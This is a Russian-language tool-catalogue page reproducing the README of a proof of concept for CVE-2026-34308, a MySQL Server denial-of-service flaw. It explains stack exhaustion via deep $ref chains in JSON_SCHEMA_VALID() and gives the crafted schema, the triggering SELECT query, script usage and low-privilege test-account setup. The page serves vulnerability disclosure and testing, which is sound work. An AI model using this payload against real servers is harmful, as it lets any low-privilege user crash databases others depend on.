Skip to content
KitploitKITPLOIT
ИнструментыБлог
Отправить
ИнструментыБлог
Отправить

Инструменты для хакинга, пентеста и кибербезопасности — ваш арсенал защиты!

Kitploit — это каталог инструментов для хакинга, кибербезопасности и пентестинга. Находите последние обновления проектов для поиска уязвимостей, анализа систем, автоматизации тестирования и усиления вашей безопасности.

··Ленты·Контакты·Конфиденциальность·© 2026 Kitploit

Каталог инструментов

Категории

Все категории
Loading categories
CVE-2026-34308 — Доказательство концепции для CVE-2026-34308 — уязвимости типа «отказ в обслуживании» в компоненте JSON сервера MySQL. Демонстрирует исчерпание стека через глубокие цепочки `$ref` в `JSON_SCHEMA_VALID()`, приводящее к сбою сервера. Включает Python-скрипт PoC и технический анализ. | Kitploit
Инструменты/GitHubGitHub/joakimbulow/cve-2026-34308
Анализ уязвимостейЭксплуатацияТестирование на ПроникновениеБезопасность Баз Данных
GitHubjoakimbulow/cve-2026-34308

CVE-2026-34308

Доказательство концепции для CVE-2026-34308 — уязвимости типа «отказ в обслуживании» в компоненте JSON сервера MySQL. Демонстрирует исчерпание стека через глубокие цепочки `$ref` в `JSON_SCHEMA_VALID()`, приводящее к сбою сервера. Включает Python-скрипт PoC и технический анализ.

Репозиторий
3 месяцев назадЕщё не проверено

Популярное

Смотреть все →

Откройте для себя самые используемые инструменты нашего сообщества.

Изучить все инструменты

Просмотрите нашу коллекцию инструментов

Смотреть все инструменты →
Поделиться

CVE-2026-34308: MySQL Server (компонент JSON) отказ в обслуживании

Официальный бюллетень вендора: Oracle Critical Patch Update Advisory — April 2026.

Сводка (из опубликованного CVE)

Уязвимость в Oracle MySQL Server (компонент: Server: JSON).

Поддерживаемые затронутые версии: 8.0.0–8.0.45, 8.4.0–8.4.8 и 9.0.0–9.6.0.

Уязвимость позволяет пользователю с низкими привилегиями вызвать сбой MySQL Server.

Базовая оценка CVSS 3.1: 6.5 (влияние только на доступность)
Вектор CVSS: CVSS:3.1/AV:N/AC:L/PR:L/UI:N/S:U/C:N/I:N/A:H


Дополнительный технический анализ (не является частью текста CVE)

Наблюдаемый механизм: Глубокая рекурсия при вычислении MySQL функции JSON_SCHEMA_VALID() для JSON Schema, содержащей длинную линейную цепочку указателей $ref, без эффективного ограничения глубины во время компиляции/валидации схемы — что приводит к исчерпанию стека, зависанию или повторяющемуся сбою.

Цепочка вызовов (концептуально):

root@kitploit:~
Client SQL → JSON_SCHEMA_VALID(schema, instance)
  → внутренняя валидация JSON Schema → повторное разрешение $ref
  → исчерпание стека → зависание / сбой

Требуемые привилегии

Для этого PoC достаточно любой аутентифицированной учётной записи MySQL: предоставьте только USAGE на *.* (минимальная привилегия MySQL — возможность подключения — без SELECT, доступа к таблицам или ролей администратора). Если пользователь может открыть сеанс и выполнить SELECT JSON_SCHEMA_VALID(...), он может вызвать это состояние.


Proof of Concept

PoC-скрипт: poc_schema_dos.py

Создаёт JSON-схему с линейной цепочкой $ref (пример глубины 1200):

root@kitploit:~
{
  "$ref": "#/definitions/l0",
  "definitions": {
    "l0": {"$ref": "#/definitions/l1"},
    "l1": {"$ref": "#/definitions/l2"},
    ...
    "l1200": {"type": "string"}
  }
}

Отправляется в MySQL как: SELECT JSON_SCHEMA_VALID('<schema>', '"x"');

При тестировании на уязвимых сборках наблюдалось, что это вызывает сбой сервера примерно в течение одной секунды (точное время зависит от оборудования, флагов сборки и глубины схемы).

Использование

root@kitploit:~
python3 poc_schema_dos.py --host 127.0.0.1 --port 3306 --user root --password ""

Для тестирования учётной записи с низкими привилегиями:

root@kitploit:~
CREATE USER 'test'@'%' IDENTIFIED BY 'password';
GRANT USAGE ON *.* TO 'test'@'%';
FLUSH PRIVILEGES;

Затем: python3 poc_schema_dos.py --user test --password password


CVSS v3.1 (официальный вектор)

6.5 — AV:N/AC:L/PR:L/UI:N/S:U/C:N/I:N/A:H

  • AV:N: Доступность по сети
  • AC:L: Низкая сложность атаки
  • PR:L: Требуются низкие привилегии
  • UI:N: Не требуется взаимодействие с пользователем
  • S:U: Область действия не изменяется
  • C:N / I:N: Нет влияния на конфиденциальность или целостность
  • A:H: Высокое влияние на доступность (зависание / повторяющийся сбой / DoS)

Файлы

  • poc_schema_dos.py: PoC-скрипт
  • README.md: Этот файл
Скачать инструмент